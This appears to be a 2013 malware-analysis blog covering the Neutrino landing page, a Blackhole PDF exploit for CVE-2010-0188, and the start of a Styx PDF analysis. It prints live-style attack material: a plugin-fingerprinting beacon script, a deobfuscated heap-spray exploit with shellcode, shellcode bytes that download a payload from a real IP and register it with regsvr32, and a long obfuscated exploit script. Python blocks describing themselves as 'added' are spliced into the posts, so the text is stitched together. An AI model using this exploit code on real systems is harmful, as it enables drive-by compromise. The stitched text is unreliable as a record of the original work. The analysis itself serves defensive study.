Tuesday, April 23, 2013

Neutrino Exploit Kit landing page change or variation


I picked this up today and it seems like the landing page of Neutrino has changed. Gone is the random string generation after the prefixed h, i and p HTTP POST variables. The HTTP URL c(random string) is also hardcoded instead of randomly generated. The HTTP POST request has changed as well, as there is no more h(random string). The i(random string) variable has grown beyond the previous limit of max 11 chars.

For the previous landing page I have seen (reported by @kafeine and @malwaresigs), look at this post.
For a more thorough analysis, look at "Neutrino Exploit Kit Analysis".

The new landing page


<!DOCTYPE HTML>
<html>
    
    <head>
        <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
        <script type="text/javascript" src="scripts/js/plugin_detector.js"></script>
        <script type="text/javascript">
            $(document).ready(function () {
                АН602(
                    '517679ebaba2cc891d009dee',
                    'gbdlnep',
                    'cxiqocvbqd',
                    'pcnfjrcxxpu',
                    'ivexxbpclutvfxs');
            });

            function \u0410\u041d602(a, c, d, b, e) {
                a = {
                    hid: a,
                    plugins: {
                        adobe_reader: PluginDetect.getVersion("AdobeReader"),
                        java: PluginDetect.getVersion("Java"),
                        flash: PluginDetect.getVersion("Flash"),
                        quick_time: PluginDetect.getVersion("QuickTime"),
                        real_player: PluginDetect.getVersion("RealPlayer"),
                        shockwave: PluginDetect.getVersion("Shockwave"),
                        silver_light: PluginDetect.getVersion("Silverlight"),
                        vlc: PluginDetect.getVersion("VLC"),
                        wmp: PluginDetect.getVersion("WMP")
                    }
                };
                var f = {};
                f[b] = c;
                f[e] = encodeURIComponent(xor(JSON.stringify(a),
                    c));
                $.post(d, f, function (a) {
                    $("body").append(xor(decodeURIComponent(a), c))
                })
            }
            function xor(a, c) {
                for (var d = "", b = 0, e = 0, b = 0; b < a.length; b++) e = Math.floor(b % c.length), d += String.fromCharCode(a.charCodeAt(b) ^ c.charCodeAt(e));
                return d
            }
            JSON.stringify = JSON.stringify || function (a) {
                var c = typeof a;
                if ("object" != c || null === a) return "string" == c && (a = '"' + a + '"'), String(a);
                var d, b, e = [],
                    f = a && a.constructor == Array;
                for (d in a) b = a[d], c = typeof b, "string" == c ? b = '"' + b + '"' : "object" == c && null !== b && (b = JSON.stringify(b)), e.push((f ? "" : '"' + d + '":') + String(b));
                return (f ? "[" : "{") + String(e) + (f ? "]" : "}")
            };
        </script>
    </head>
    
    <body></body>

</html>


These changes give us a new HTTP POST as well:
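The POST the landing page above builds can be decoded offline, which is what matters for triage: the XOR key (c) travels in clear in the p-variable, the plugin fingerprint goes XOR'ed with that key and URI-encoded in the i-variable, and the server reply is XOR'ed with the same key before being appended to the body. The Python below is an added example of that decoding, not code from this post or from the kit. The field names, key and hid value are the ones in the landing page above; the plugin versions and the sample POST body are constructed here, and the second percent-encoding layer is assumed from the way jQuery's $.post form-encodes its data object.

```python
import json
from urllib.parse import parse_qs, quote, unquote, urlencode

# Values copied from the landing page above: hid argument, xor key (c) and the two
# POST field names (b carries the key, e carries the encoded fingerprint).
HID = "517679ebaba2cc891d009dee"
KEY = "gbdlnep"
KEY_FIELD = "pcnfjrcxxpu"
DATA_FIELD = "ivexxbpclutvfxs"

# encodeURIComponent() leaves exactly these characters (plus letters and digits) unescaped
URI_SAFE = "-_.!~*'()"


def xor_str(text, key):
    """Port of the page's xor(): each char code XORed with the repeating key."""
    return "".join(chr(ord(ch) ^ ord(key[i % len(key)])) for i, ch in enumerate(text))


def build_beacon(plugins, key=KEY, hid=HID):
    """What the landing page computes before $.post: JSON -> xor -> encodeURIComponent."""
    payload = json.dumps({"hid": hid, "plugins": plugins}, separators=(",", ":"))
    return quote(xor_str(payload, key), safe=URI_SAFE)


def decode_beacon(body, key_field=KEY_FIELD, data_field=DATA_FIELD):
    """Recover the fingerprint JSON from a captured x-www-form-urlencoded POST body.

    jQuery form-encodes the already URI-encoded blob, so a capture is percent-encoded
    twice: parse_qs() removes the outer layer, unquote() the inner one.
    """
    fields = parse_qs(body, keep_blank_values=True)
    key = fields[key_field][0]
    blob = unquote(fields[data_field][0])
    return json.loads(xor_str(blob, key))


def build_response(html, key):
    """Server side of the exchange as the $.post callback expects it: xor, then URI-encode."""
    return quote(xor_str(html, key), safe=URI_SAFE)


def decode_response(response_text, key):
    """Mirror of $("body").append(xor(decodeURIComponent(a), c))."""
    return xor_str(unquote(response_text), key)


# Constructed sample (not captured traffic): the plugin set PluginDetect would report,
# with null for plugins that are not installed, wrapped in a form body as jQuery sends it.
SAMPLE_PLUGINS = {
    "adobe_reader": "9.3.0", "java": "1.6.0.31", "flash": "11.5.502.146",
    "quick_time": None, "real_player": None, "shockwave": None,
    "silver_light": None, "vlc": None, "wmp": "11.0.5721.5145",
}
SAMPLE_BODY = urlencode({KEY_FIELD: KEY, DATA_FIELD: build_beacon(SAMPLE_PLUGINS)})

if __name__ == "__main__":
    print(SAMPLE_BODY)
    print(json.dumps(decode_beacon(SAMPLE_BODY), indent=2))
```

Against a real capture the same decoder applies, provided the two field names are taken from the landing page that produced the POST: they differ per kit instance, which is exactly the kind of change this post is about.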





If I'm wrong, please correct me.

Happy detecting Neutrino exploit kits :)

Thursday, April 18, 2013

Blackhole Exploit Kit - deobfuscating the CVE-2010-0188 PDF


After looking at the Styx PDF for CVE-2010-0188 I thought it might be fun to take a quick look at the Blackhole PDF for CVE-2010-0188 as well. How to fetch it is explained here.
I even managed to throw in a tiny piece of Python code, so we can enjoy some weird Monty Python references further down :)

Here is how it goes...

1. PDF overview



Lots of streams to look into. First let's check if pdf.py can give us more info and if there is JavaScript in there somewhere.


No luck there. Probably there is JavaScript in there somewhere though, so let's keep on looking.
Let's try to extract the streams with pdfextract:


Hmmm, no such luck.
Let's go through it piece by piece with pyew then:



So a lot of gzipped content... Let's view the streams with pdfvi:


Stream no 8. Bingo, this looks like something worth investigating further.

2. The JavaScript from the PDF


<template><subform name="form1"><pageSet><pageArea><contentArea h="10.5in" w="8in" x="0.25in" y="0.25in"></contentArea><medium long="11in" short="8.5in" stock="letter"></medium></pageArea></pageSet><subform h="10.5in" w="8in"><field h="98.425mm" name="ImageField1" w="28.575mm" x="95.25mm" y="19.05mm"><ui><imageEdit></imageEdit></ui><event activity="initialize" xmlns:xfa="http://testset.com">
<xfa:script contentType='application/x-javascript'>
if(ImageField1.rawValue===null)p="parseIn&#116;";
pp="&#102;romCharCode";
a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
a=a.replace.apply(a,[/(\^!@#)|(\*)/g,&quot;&quot;]);
s=[];
cc=String;
cc=cc[pp];
tt=event[cc.apply(String,[0x74,0x61,0x72,0x67,0x65,0x74])];
for(i=0;i&lt;a.&#108;ength;i+=2){
 s.push(tt[p](a.&#115;ubstr(i,3-1),26)-15);
}
if(tt.info["Authors"]===null){
 k=cc.apply(String,s);
 q="e"+cc.apply(String,[0x76]);
 q+="al";
 tt[q](&#107;);
}
</xfa:script></event></field></subform><proto></proto></subform><?templateDesigner DefaultLanguage FormCalc?><?templateDesigner DefaultRunAt client?><?templateDesigner Grid show:1, snap:1, units:0, color:ff8080, origin:(0,0), interval:(125000,125000)?><?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?><?templateDesigner Zoom 76?></template>
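The event script above is a small two-stage loader: after checking the image field and the document's Authors entry, it spells "target" and "eval" with String.fromCharCode, strips the `^!@#` and `*` filler from the long string `a`, reads the rest two characters at a time as parseInt(pair, 26) - 15, and eval's the result. Since that string is not reproduced here, the Python below is an added example (not this post's or the kit's code) that ports the decoder and includes the inverse transform only to build a constructed input for it.

```python
import re

# The filler the page's script removes: a.replace(/(\^!@#)|(\*)/g, "")
JUNK_RE = re.compile(r"\^!@#|\*")
BASE26_DIGITS = "0123456789abcdefghijklmnop"
OFFSET = 15   # the "- 15" applied after parseInt(pair, 26)


def decode_stage1(blob):
    """Port of the XFA event script: strip filler, read two base-26 digits per character,
    subtract 15, and return the second-stage source that the script hands to eval."""
    cleaned = JUNK_RE.sub("", blob)
    chars = []
    for i in range(0, len(cleaned), 2):
        pair = cleaned[i:i + 2]              # a.substr(i, 3-1): two digits at a time
        chars.append(chr(int(pair, 26) - OFFSET))
    return "".join(chars)


def encode_stage1(text, junk_every=7):
    """Inverse transform, present only to build a constructed input for decode_stage1()."""
    digits = []
    for ch in text:
        value = ord(ch) + OFFSET
        if not 0 <= value < 26 * 26:
            raise ValueError("%r does not fit in two base-26 digits" % ch)
        digits.append(BASE26_DIGITS[value // 26] + BASE26_DIGITS[value % 26])
    encoded = "".join(digits)
    out = []
    for i, ch in enumerate(encoded):
        out.append(ch)
        if (i + 1) % junk_every == 0:            # alternate the two filler forms
            out.append("^!@#" if (i // junk_every) % 2 == 0 else "*")
    return "".join(out)


# Constructed second stage, standing in for the string the PDF carries (not reproduced above)
SAMPLE_STAGE2 = "var k = app.viewerVersion; // constructed sample, not the PDF's payload"
SAMPLE_BLOB = encode_stage1(SAMPLE_STAGE2)

if __name__ == "__main__":
    print(SAMPLE_BLOB)
    print(decode_stage1(SAMPLE_BLOB))
```

Decoding statically like this avoids running the first stage in a JavaScript engine at all, which is useful because the script's environment checks (the field value and the Authors entry) only pass inside a PDF viewer.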



Let's clean it, run it through node-js and see what comes out:

var padding;
var bbb, ccc, ddd, eee, fff, ggg, hhh;
var pointers_a, i;
var x = new Array();
var y = new Array();
var _l1 = "4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141" + "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".split('').reverse().join('').replace(/;/g, '');
var _l2 = "4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f000400004141414141414141" + "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".split('').reverse().join('').replace(/;/g, '');
//_l3 = app; @malforsec not needed
_l4 = new Array();

function _l5() {
//    var _l6 = _l3.viewerVersion.toString();
    var _l6 = "9.3.0"; //@malforsec set viewer version
    _l6 = _l6.replace('.', '');
    while (_l6.length < 4) _l6 += '0';
    return parseInt(_l6, 10)
}
function _l7(_l8, _l9) {
    while (_l8.length * 2 < _l9) _l8 += _l8;
    return _l8.substring(0, _l9 / 2)
}
function _I0(_I1) {
    _I1 = unescape(_I1);
    roteDak = _I1.length * 2;
    dakRote = unescape('%u9090');
    spray = _l7(dakRote, 0x2000 - roteDak);
    loxWhee = _I1 + spray;
    loxWhee = _l7(loxWhee, 524098);
    for (i = 0; i < 400; i++) _l4[i] = loxWhee.substr(0, loxWhee.length - 1) + dakRote;
}
function _I2(_I1, len) {
    while (_I1.length < len) _I1 += _I1;
    return _I1.substring(0, len)
}
function _I3(_I1) {
    ret = '';
    for (i = 0; i < _I1.length; i += 2) {
        b = _I1.substr(i, 2);
        c = parseInt(b, 16);
        ret += String.fromCharCode(c);
    }
    return ret
}
function _ji1(_I1, _I4) {
    _I5 = '';
    for (_I6 = 0; _I6 < _I1.length; _I6++) {
        _l9 = _I4.length;
        _I7 = _I1.charCodeAt(_I6);
        _I8 = _I4.charCodeAt(_I6 % _l9);
        _I5 += String.fromCharCode(_I7 ^ _I8);
    }
    return _I5
}
function _I9(_I6) {
    _j0 = _I6.toString(16);
    _j1 = _j0.length;
    _I5 = (_j1 % 2) ? '0' + _j0 : _j0;
    return _I5
}
function _j2(_I1) {
    _I5 = '';
    for (_I6 = 0; _I6 < _I1.length; _I6 += 2) {
        _I5 += '%u';
        _I5 += _I9(_I1.charCodeAt(_I6 + 1));
        _I5 += _I9(_I1.charCodeAt(_I6))
    }
    return _I5
}
function _j3() {
    _j4 = _l5();
    if (_j4 < 9000) {
        _j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
        _j6 = _l1;
        _j7 = _I3(_j6)
    } else {
        _j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
        _j6 = _l2;
        _j7 = _I3(_j6)
    }
    _j8 = 'SUkqADggAABB';
    _j9 = _I2('QUFB', 10984);
    _ll0 = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
    _ll1 = _j8 + _j9 + _ll0 + _j5;
    _ll2 = _ji1(_j7, '');
    if (_ll2.length % 2) _ll2 += unescape('%00');
    _ll3 = _j2(_ll2);
    with({
        k: _ll3
    }) _I0(k);
//    ImageField1.rawValue = _ll1
    console.log(_ll1); //@malforsec log result
}
_j3();



That's better! Looks like shellcode in the middle there.

3. Shellcode


Some magic is performed by these dark agents, or should we call them Dark Knights? Let's see if we can do just as well as King Arthur and see if we too can pass over the bridge when meeting The Dark Knight (youtube - warning, not for sensitive people).

Short Python intermezzo: just concatenating the strings from the JavaScript code, with the last string reversed, and outputting the chars to get the binary code.


>>> hexstr = "4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141" + "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"[::-1]
>>> hexbytes = "".join(chr(int(hexstr[i:i+2],16)) for i in xrange(0,len(hexstr),2))
>>> hexbytes
'L `\x0f\x05\x17\x80J< `\x0f\x0fc\x80J\xa3\xeb\x80J0 \x82Jn/\x80JAAAA&\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x129\x80Jd `\x0f\x00\x04\x00\x00AAAAAAAAf\x83\xe4\xfc\xfc\x85\xe4u4\xe9_3\xc0d\x8b@0\x8b@\x0c\x8bp\x1cV\x8bv\x083\xdbf\x8b^<\x03t3,\x81\xee\x15\x10\xff\xff\xb8\x8b@0\xc3F9\x06u\xfb\x874$\x85\xe4uQ\xe9\xebLQV\x8bu<\x8bt5x\x03\xf5V\x8bv \x03\xf53\xc9IA\xfc\xad\x03\xc53\xdb\x0f\xbe\x108\xf2t\x08\xc1\xcb\r\x03\xda@\xeb\xf1;\x1fu\xe6^\x8b^$\x03\xddf\x8b\x0cK\x8dF\xec\xffT$\x0c\x8b\xd8\x03\xdd\x8b\x04\x8b\x03\xc5\xab^Y\xc3\xebS\xad\x8bh \x80}\x0c3t\x03\x96\xeb\xf3\x8bh\x08\x8b\xf7j\x05Y\xe8\x98\xff\xff\xff\xe2\xf9\xe8\x00\x00\x00\x00XPj@h\xff\x00\x00\x00P\x83\xc0\x19PU\x8b\xec\x8b^\x10\x83\xc3\x05\xff\xe3hon\x00\x00hurlmT\xff\x16\x83\xc4\x08\x8b\xe8\xe8a\xff\xff\xff\xeb\x02\xebr\x81\xec\x04\x01\x00\x00\x8d\\$\x0c\xc7\x04$regs\xc7D$\x04vr32\xc7D$\x08 -s Sh\xf8\x00\x00\x00\xffV\x0c\x8b\xe83\xc9Q\xc7D\x1d\x00wpbt\xc7D\x1d\x05.dll\xc6D\x1d\t\x00Y\x8a\xc1\x040\x88D\x1d\x04AQj\x00j\x00SWj\x00\xffV\x14\x85\xc0u\x16j\x00S\xffV\x04j\x00\x83\xeb\x0cS\xffV\x04\x83\xc3\x0c\xeb\x02\xeb\x13G\x80?\x00u\xfaG\x80?\x00u\xc4j\x00j\xfe\xffV\x08\xe8\x9c\xfe\xff\xff\x8eN\x0e\xec\x98\xfe\x8a\x0e\x89o\x01\xbd3\xca\x8a[\x1b\xc6Fy6\x1a/phttp://129.121.65.54/27aa2a2ac05d97b8a923519db359409c/27aa2a2ac05d97b8a923519db359409c/q.php?fsp=1h:1k:1i:30:1j&mfuqeope=1g:1n:32:33:1n:1n:1n:2v:31:1o&suoi=1i&nvqgdt=bcxlb&cdo=ymce\x00\x00'



Looks like we got some nice bin code out, and we even got straight to The Holy Grai.. - eehhm, the payload URL.

4. Payload URL


Let's look at the code in hex/ASCII format:


0000000: 4c20 600f 0517 c280 4a3c 2060 0f0f 63c2  L `.....J< `..c.
0000010: 804a c2a3 c3ab c280 4a30 20c2 824a 6e2f  .J......J0 ..Jn/
0000020: c280 4a41 4141 4126 0000 0000 0000 0000  ..JAAAA&........
0000030: 0000 0000 0000 0012 39c2 804a 6420 600f  ........9..Jd `.
0000040: 0004 0000 4141 4141 4141 4141 66c2 83c3  ....AAAAAAAAf...
0000050: a4c3 bcc3 bcc2 85c3 a475 34c3 a95f 33c3  .........u4.._3.
0000060: 8064 c28b 4030 c28b 400c c28b 701c 56c2  .d..@0..@...p.V.
0000070: 8b76 0833 c39b 66c2 8b5e 3c03 7433 2cc2  .v.3..f..^<.t3,.
0000080: 81c3 ae15 10c3 bfc3 bfc2 b8c2 8b40 30c3  .............@0.
0000090: 8346 3906 75c3 bbc2 8734 24c2 85c3 a475  .F9.u....4$....u
00000a0: 51c3 a9c3 ab4c 5156 c28b 753c c28b 7435  Q....LQV..u<..t5
00000b0: 7803 c3b5 56c2 8b76 2003 c3b5 33c3 8949  x...V..v ...3..I
:
0000130: 6a05 59c3 a8c2 98c3 bfc3 bfc3 bfc3 a2c3  j.Y.............
0000140: b9c3 a800 0000 0058 506a 4068 c3bf 0000  .......XPj@h....
0000150: 0050 c283 c380 1950 55c2 8bc3 acc2 8b5e  .P.....PU......^
0000160: 10c2 83c3 8305 c3bf c3a3 686f 6e00 0068  ..........hon..h
0000170: 7572 6c6d 54c3 bf16 c283 c384 08c2 8bc3  urlmT...........
0000180: a8c3 a861 c3bf c3bf c3bf c3ab 02c3 ab72  ...a...........r
0000190: c281 c3ac 0401 0000 c28d 5c24 0cc3 8704  ..........\$....
00001a0: 2472 6567 73c3 8744 2404 7672 3332 c387  $regs..D$.vr32..
00001b0: 4424 0820 2d73 2053 68c3 b800 0000 c3bf  D$. -s Sh.......
00001c0: 560c c28b c3a8 33c3 8951 c387 441d 0077  V.....3..Q..D..w
00001d0: 7062 74c3 8744 1d05 2e64 6c6c c386 441d  pbt..D...dll..D.
00001e0: 0900 59c2 8ac3 8104 30c2 8844 1d04 4151  ..Y.....0..D..AQ
00001f0: 6a00 6a00 5357 6a00 c3bf 5614 c285 c380  j.j.SWj...V.....
0000200: 7516 6a00 53c3 bf56 046a 00c2 83c3 ab0c  u.j.S..V.j......
0000210: 53c3 bf56 04c2 83c3 830c c3ab 02c3 ab13  S..V............
0000220: 47c2 803f 0075 c3ba 47c2 803f 0075 c384  G..?.u..G..?.u..
0000230: 6a00 6ac3 bec3 bf56 08c3 a8c2 9cc3 bec3  j.j....V........
0000240: bfc3 bfc2 8e4e 0ec3 acc2 98c3 bec2 8a0e  .....N..........
0000250: c289 6f01 c2bd 33c3 8ac2 8a5b 1bc3 8646  ..o...3....[...F
0000260: 7936 1a2f 7068 7474 703a 2f2f 3132 392e  y6./phttp://129.
0000270: 3132 312e 3635 2e35 342f 3237 6161 3261  121.65.54/27aa2a
0000280: 3261 6330 3564 3937 6238 6139 3233 3531  2ac05d97b8a92351
0000290: 3964 6233 3539 3430 3963 2f32 3761 6132  9db359409c/27aa2
00002a0: 6132 6163 3035 6439 3762 3861 3932 3335  a2ac05d97b8a9235
00002b0: 3139 6462 3335 3934 3039 632f 712e 7068  19db359409c/q.ph
00002c0: 703f 6673 703d 3168 3a31 6b3a 3169 3a33  p?fsp=1h:1k:1i:3
00002d0: 303a 316a 266d 6675 7165 6f70 653d 3167  0:1j&mfuqeope=1g
00002e0: 3a31 6e3a 3332 3a33 333a 316e 3a31 6e3a  :1n:32:33:1n:1n:
00002f0: 316e 3a32 763a 3331 3a31 6f26 7375 6f69  1n:2v:31:1o&suoi
0000300: 3d31 6926 6e76 7167 6474 3d62 6378 6c62  =1i&nvqgdt=bcxlb
0000310: 2663 646f 3d79 6d63 6500 000a            &cdo=ymce...




Yes, we got the URL right. So if we were after that, we could now just fetch it...
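Two details of the byte reconstruction are worth checking in code. First, the PDF script reverses the second hex string and then strips every ';' from it, while the REPL snippet above only does the reversal. Second, the xxd listing above shows c280 where the Python repr shows \x80 (and c2a3 for \xa3, c3ab for \xeb): the dump on disk is the UTF-8 encoding of the bytes rather than the bytes themselves, and a file in that form will not disassemble as the original shellcode. The Python below is an added example, not this post's code: the first hex string is the one from the PDF script above, while the second string (not reproduced on this page) is replaced by a constructed tail with a placeholder URL.

```python
import re

# First hex string of the PDF script above, copied as-is (68 bytes). The second string is
# not reproduced on this page, so a constructed tail stands in for it below.
PART1 = ("4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141"
         + "26" + "00" * 15                      # the 15 NUL bytes visible in the repr above
         + "1239804a6420600f000400004141414141414141")

TAIL_BYTES = b"\x90\x90http://payload.example/q.php?id=PLACEHOLDER\x00\x00"   # constructed


def mangle_like_pdf(raw):
    """Constructed PDF-side form of a byte string: hex, reversed, with ';' sprinkled in,
    which is what .split('').reverse().join('').replace(/;/g, '') undoes."""
    rev = raw.hex()[::-1]
    return ";".join(rev[i:i + 5] for i in range(0, len(rev), 5))


PART2 = mangle_like_pdf(TAIL_BYTES)


def js_hex_to_bytes(part1, part2):
    """Mirror of the JS: part1 + reversed part2 with ';' removed, then hex pairs to bytes."""
    return bytes.fromhex(part1 + part2[::-1].replace(";", ""))


def looks_utf8_mangled(dump):
    """True when a supposedly binary dump is valid UTF-8 with high bytes present, the pattern
    in the xxd listing above (0x80 appears as c2 80, 0xa3 as c2 a3, 0xeb as c3 ab)."""
    try:
        dump.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return any(b >= 0x80 for b in dump)


def undo_utf8_mangling(dump):
    """Collapse each UTF-8 sequence back to the byte it encodes; latin-1 maps U+0000..U+00FF
    one-to-one onto bytes, so a code point above 0xff means this was real text, not a dump."""
    if not looks_utf8_mangled(dump):
        return dump
    try:
        return dump.decode("utf-8").encode("latin-1")
    except UnicodeEncodeError:
        return dump


def find_urls(blob):
    """Printable http(s) runs inside the bytes; the NUL terminator ends the match."""
    return [m.decode("ascii") for m in re.findall(rb"https?://[\x21-\x7e]+", blob)]


if __name__ == "__main__":
    raw = js_hex_to_bytes(PART1, PART2)
    saved_as_text = raw.decode("latin-1").encode("utf-8")   # reproduces the c2 80 pattern above
    print(len(raw), len(saved_as_text), looks_utf8_mangled(saved_as_text))
    print(find_urls(undo_utf8_mangling(saved_as_text)))
```

The URL scan works on either form because the URL is pure ASCII, which is why the author got the right address even from the UTF-8 dump; the shellcode bytes in front of it are the part that changes, so run undo_utf8_mangling() before handing such a file to a disassembler or emulator.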

5. Epilogue


Feels good to be on the same side as King Arthur and to be able to reverse and deobfuscate the Black(hole) Knights' evi(a)l doings. And get our hands on The Holy Grail.

PS: running the shellcode with sctest and rasm failed with errors due to buffer overflow - any tip on how to get around that is very much appreciated.



Happy Blackhole PDF deobfuscation :)

Friday, April 12, 2013

Styx analysis - a peek inside the CVE-2010-0188 PDF



Back to the PDF I fetched from the Styx EK the other day. Let's see what it has got inside.

1. Overview of the XwYBSGiPQ.pdf

pdfid gives us an overview:

Let's fire up pyew:


Let's look at that stream:



pdfextract dumps objects, streams, scripts and so on for us:

$pdfextract XwYBSGiPQ.pdf

Nothing else was dumped but the stream we already saw.

2. Details of the PDF stream


<?xml version="1.0"?><xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config xmlns="http://www.xfa.org/schema/xci/1.0/"><present><pdf>
<version>1.65</version><interactive>1</interactive><linearized>1</linearized></pdf><xdp><packets>*</packets></xdp><destination>pdf</destination></present></config>
<template xmlns="http://www.xfa.org/schema/xfa-template/2.5/">
<subform layout="tb" locale="en_US" name="ASsQulJ">
    <pageSet>
        <pageArea id="zUgwaCv" name="zUgwaCv">
            <contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/>
            <medium long="792pt" short="612pt" stock="default"/>
  </pageArea>
 </pageSet>
    <subform h="756pt" w="576pt" name="XgNBk">
        <field h="56mm" name="pgGzgu" w="85mm" x="53.6501mm" y="88.6499mm">
            <event activity="initialize" name="CQIkirHu">
                <script contentType="application/x-javascript">
                    var ZFDIxkYBA = 370;
ZFDIxkYBA+=10;



fGRdP=&quot;&quot;;
dTuOAK='MfSisX';if (dTuOAK=='Wbsid') Qqlxr();var xxnz='qxhn';

WDpZj = &quot;f\n\n noitcnusabocne_46e(ed\n{ )atad   46b rav  = GFEDCBA\&quot;JIHRQPONMLKUTScbaZYXWVfednmlkjihgqpoyxwvutsr10z98765432=/+v    \n;\&quot; ra ,2o ,1o,3o,2h ,1h 3h ib ,4h ,,st\n,0 = i     ca     0 =      \n,e  ,\&quot;\&quot; = cn  \nmt      a_p;][ = rr\n \n{ od      \n1o       = ahc.atadoCr++i(tAed\n;)         2oc.atad =rahi(tAedoC)++      \n;o  atad = 3hc.tAedoCra+i(  \n \n;)+    stib   o = 61 &lt;&lt; 1o || 8 &lt;&lt; 23o     \n \n;   ib = 1h  st &amp; 81 &gt;&gt;3x0     \n;f   tib = 2h&gt; s0 &amp; 21 &gt;f3x      \n;h  stib = 3&gt;&gt; 3x0 &amp; 6 \n;f         4h&amp; stib =x0    \n\n;f3   ra_pmt  a[rb = ]++c.46h(tArahc )1hc.46b +Ara + )2h(t46b(tArahc.)3hc.46b + rah\n;)4h(tA   elihw } i( .atad &lt; nel\n \n;)htg   t = cne _pmnioj.rra''(   \n \n;)er cne nrut}\n;oitcnuf\ng n)(rev_te \n{a rav   _pppa = revv.preVreweioisirtSot.n(gna    \n;)_pppa = revv_palper.re(ec)'' ,'.' \n;elihw   pa(el.rev_ptgn\n{)4 &lt; h   ppa     ev_'0' =+ r \n;er\t\n}   rutIesrap n(tn,rev_ppa01 nuf\n}\n;)itc(worg nodob{)nel ,y  \n(elihw  dobhtgnel.y &lt;   \n{)nel    ydob    =+  \n;ydob}  ter    \nnruus.ydob tsb ,0(gnirnelnuf\n}\n;)itc)(nur no\t\n{_lru ravravPdRGf =  + x\\30=h&amp;\&quot;\&quot;00llehs\t\n; = 0x\\8Ex\\\&quot;x\\0x\\00x\\00\\00\\38x\\D5xDEx13x\\50x\\Cx\\8x\\46x\\9x\\Bx\\03x\\17\\B8\\C0x\\67xB8xC1x\\67x\\8x\\0x\\64x\\Bx\\8x\\E7x\\B8\\02\\63x\\B8x66xF4x\\93x\\1x\\Fx\\57x\\8x\\2x\\FEx\\EB\\00\\00x\\00x10xFBx\\EEx\\Cx\\0x\\00x\\Fx\\0x\\10x\\00\\FE\\08x\\8Ex10x00x\\00x\\8x\\8x\\AEx\\9x\\1x\\FEx\\2C\\00\\00x\\00x25x08x\\86x\\0x\\0x\\00x\\0x\\0x\\59x\\FF\\FC\\00x\\00x00xAEx\\98x\\8x\\Ex\\2Cx\\1x\\Fx\\00x\\00\\00\\6Fx\\13x10xA8x\\2Cx\\9x\\0x\\53x\\Cx\\0x\\00x\\20\\00\\BFx\\08x00x60x\\47x\\8x\\3x\\C1x\\8x\\2x\\BEx\\64\\EE\\40x\\6Cx23x98x\\00x\\Ex\\Cx\\18x\\Ax\\2x\\10x\\2E\\00\\25x\\00xFFx3Dx\\59x\\0x\\0x\\00x\\0x\\0x\\AEx\\98\\18\\DEx\\2Cx10x00x\\00x\\5x\\Fx\\05x\\2x\\Fx\\7Dx\\59\\00\\00x\\00xA6xA6x\\00x\\0x\\Ex\\98x\\0x\\Ax\\2Cx\\18\\FE\\00x\\00x00x98x\\25x\\Ex\\Cx\\18x\\Ax\\2x\\20x\\B0\\00\\25x\\00xA6xFFx\\00x\\Dx\\0x\\A6x\\0x\\5x\\AEx\\98\\18\\FEx\\2Cx00x00x\\00x\\5x\\9x\\FFx\\2x\\5x\\00x\\BD\\00\\A6x\\00x50xAEx\\98x\\8x\\Ex\\2Cx\\1x\\3x\\00x\\00\\00\\FFx\\25x59x00x\\BDx\\0x\\6x\\00x\\0x\\Ax\\FFx\\00\\59\\00x\\FDx00x00x\\00x\\0x\\0x\\00x\\0x\\0x\\00x\\00\\00\\00x\\00x00x00x\\00x\\0x\\0x\\00x\\0x\\0x\\00x\\00\\00\\00x\\00x27x76x\\56x\\7x\\7x\\67x\\3x\\2x\\23x\\33\\02\\37x\\D2x02x56x\\74x\\7x\\6x\\45x\\4x\\5x\\07x\\D6\\05\\47x\\16x86x00x\\14x\\4x\\6x\\F6x\\Cx\\1x\\C4x\\46\\96\\27x\\26x16x97x\\27x\\4x\\4x\\00x\\1x\\7x\\47x\\56\\05\\F6x\\27x36x46x\\14x\\6x\\6x\\27x\\4x\\5x\\37x\\37\\00\\96x\\75xE6x87x\\54x\\6x\\0x\\36x\\5x\\0x\\87x\\54\\96\\05x\\47x27x36x\\F6x\\6x\\7x\\37x\\5x\\3x\\BBx\\00\\98\\98x\\2Fx7Fx0Cx\\03x\\Ax\\Fx\\57x\\Ex\\Dx\\7Fx\\92\\98\\13x\\9Fx0CxC3x\\EBx\\0x\\0x\\00x\\0x\\0x\\5Bx\\30\\8B\\00x\\10x00xDAx\\66x\\0x\\Bx\\58x\\3x\\8x\\00x\\10\\00\\07x\\B8x87x6Cx\\38x\\1x\\Bx\\30x\\Cx\\5x\\10x\\8B\\00\\D8x\\00xDBx10x\\CBx\\0x\\Ax\\00x\\0x\\Dx\\58x\\30\\8B\\00x\\10x00xDAx\\BAx\\0x\\Bx\\58x\\3x\\8x\\00x\\10\\00\\BAx\\05xDAx58x\\30x\\Bx\\0x\\10x\\8x\\0x\\BAx\\00\\E5\\BDx\\13xDAx30x\\65x\\8x\\0x\\8Bx\\5x\\1x\\00x\\00\\98\\98x\\6Cx7DxCFx\\15x\\Fx\\5x\\6Ax\\3x\\9x\\40x\\47\\E5\\BEx\\34x9Ex39x\\E5x\\Dx\\0x\\0Ex\\1x\\3x\\4Cx\\58\\10\\00x\\00x13x69x\\6Fx\\6x\\Cx\\DAx\\6x\\1x\\20x\\0E\\30\\CBx\\58x10x00x\\00x\\8x\\Ax\\6Cx\\9x\\Dx\\58x\\30\\8B\\00x\\10x00xBEx\\3Cx\\1x\\0x\\00x\\0x\\0x\\00x\\00\\00\\00x\\00x00x00x\\00x\\0x\\0x\\00